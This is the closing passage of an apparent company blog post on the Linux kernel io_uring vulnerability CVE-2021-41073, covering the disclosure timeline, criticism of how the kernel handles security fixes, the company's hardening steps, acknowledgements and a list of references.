9/13/2021: Greg K-H responds to my initial report that states I want to coordinate disclosure with the linux-distros mailing list so downstream consumers can apply the patch. He says since most distros sync on stable releases, it is not necessary to get the distro list involved. I don’t get the distro list involved.

9/13/2021: I apply for a CVE via Mitre. CVE-2021-41073 is reserved.

9/18/2021: The patch hits upstream and is back ported to affected versions. I send out a disclosure via OSS mailing list.

Reflection on the Linux Kernel and Security Fixes

First, I was impressed with the short time it took going from initial report to pushing a fix. It’s no secret that Linux kernel community can be somewhat caustic to newcomers, but everyone that I interacted with was (mostly) cordial.

The reporting process, however, is confusing. The official guide is out of date and inconsistent, and it seems that everyone that has reported kernel vulnerabilities does so a bit differently. For the most part, everyone emails the linux-distros mailing list, and sometimes a CVE ID is reserved that way. In my case though, I did not contact the linux-distro list because Greg said it wasn’t necessary. Submitting patches is also done via mailing list (so, sent via email). The whole process is hard to understand, compared to modern ways of issue tracking. This recent blog post contains the relevant information that I wish I had available at the time [29].

Another thing that I noticed is the general culture around security fixes in the Linux kernel. While this is nothing new, I was surprised to see how it permeates to a microscopic level [30]. Small things such as modifying “Reported by” tags because the email has “security” in the domain name, or removing a CVE identifier from a commit message seem to be a common occurrence [31]. What is the benefit gained by obfuscating a security issue, in particular, one that already has an assigned CVE?

Exploitable vulnerabilities are patched in the upstream kernel, without a CVE, or even an honest commit message identifying it as a security bug, all the time. The consequences are of this are undeniable; it has prevented patches for exploitable vulnerabilities from being back ported, and these vulnerabilities are later exploited in the wild [28]. Attackers are capable of looking through commits to find these hidden vulnerabilities, and they’re incentivized to do so. Defenders shouldn’t be burdened with this as well.

I believe that for Linux kernel security to improve, an updated, straightforward guide on the appropriate way to disclose a vulnerability should be agreed upon and released. Additionally, transparency on what patches address security issues will help prevent downstream consumers from shipping vulnerable software.

Conclusion

At Grapl, security is truly our highest priority. Offensive security research is a critical driver for how we develop our product. With this work, we’ve taken active measures to harden our production environment in the following ways:

  1. Identify where we need to enforce boundaries. We don’t rely on the vanilla Linux kernel to enforce security boundaries around sensitive code, take significant measures to limit kernel attack surface, and use VMs managed by a restricted Firecracker process for isolation. This allows us to significantly reduce our trust in the kernel.
  2. Continue to track and investigate areas of the kernel that are prime attack surface, as we’ve done here.
  3. Audit our operating system images to ensure that we are leveraging all possible mitigations against techniques, like those described here.

Acknowledgements

Vitaly Nikolenko, for outstanding Linux kernel exploitation research. I used his universal heap spray technique in my exploit and as a basis for my universal heap leak technique.

Jann Horn, for outstanding Linux kernel exploitation research. I used his research on schedulers and as well as FUSE blocking in my exploit.

Alexander Popov, for outstanding Linux kernel exploitation research. I used his research as a guide on how to construct this exploit.

Andréa, for her incredible work creating the diagrams in this post.

Ryota Shiga, for his excellent post on exploiting io_uring. This post helped me understand io_uring internals when getting started.

netspooky, for the blog post title, edits, and general moral support.

Grapl and the Grapl team, for supporting this research.

References

  1. https://blogs.oracle.com/linux/post/an-introduction-to-the-io-uring-asynchronous-io-framework
  2. https://twitter.com/axboe/status/1483790445532512260
  3. https://wjwh.eu/posts/2021-10-01-no-syscall-server-iouring.html
  4. https://unixism.net/loti/what_is_io_uring.html
  5. https://lwn.net/Articles/810414/
  6. https://kernel.dk/io_uring.pdf
  7. https://unixism.net/loti/tutorial/sq_poll.html
  8. https://unixism.net/loti/async_intro.html
  9. https://www.theregister.com/2021/06/22/spectre_linux_performance_test_analysis/
  10. https://github.com/axboe/liburing
  11. https://windows-internals.com/ioring-vs-io_uring-a-comparison-of-windows-and-linux-implementations/
  12. https://manpages.debian.org/unstable/liburing-dev/io_uring_setup.2.en.html
  13. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41073
  14. https://lwn.net/Articles/813311/
  15. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3491
  16. https://www.zdnet.com/article/which-are-the-most-insecure-programming-languages/
  17. https://googleprojectzero.blogspot.com/2019/01/taking-page-from-kernels-book-tlb-issue.html
  18. https://www.spinics.net/lists/io-uring/msg09009.html
  19. https://duasynt.com/blog/linux-kernel-heap-spray
  20. https://argp.github.io/2012/01/03/linux-kernel-heap-exploitation/
  21. https://ruffell.nz/programming/writeups/2019/02/15/looking-at-kmalloc-and-the-slub-memory-allocator.html
  22. https://events.static.linuxfound.org/images/stories/pdf/klf2012_kim.pdf
  23. https://hammertux.github.io/slab-allocator
  24. https://twitter.com/tehjh/status/1438330352075001856
  25. https://ruia-ruia.github.io/NFC-UAF/
  26. https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html
  27. https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html
  28. https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-1048.html
  29. https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/#including-a-patch
  30. https://www.cnet.com/tech/tech-industry/torvalds-attacks-it-industry-security-circus-1/
  31. https://twitter.com/grsecurity/status/1486795432202276864
  32. https://github.com/axboe/liburing/commit/d06c81aa3c170b586b09a88ebcd2c04f3106bd44

Interested in our product? Check out our Github. Reach out for a demo!

Connect with us on the Discord and Slack - we'd love to answer any questions you may have about our product.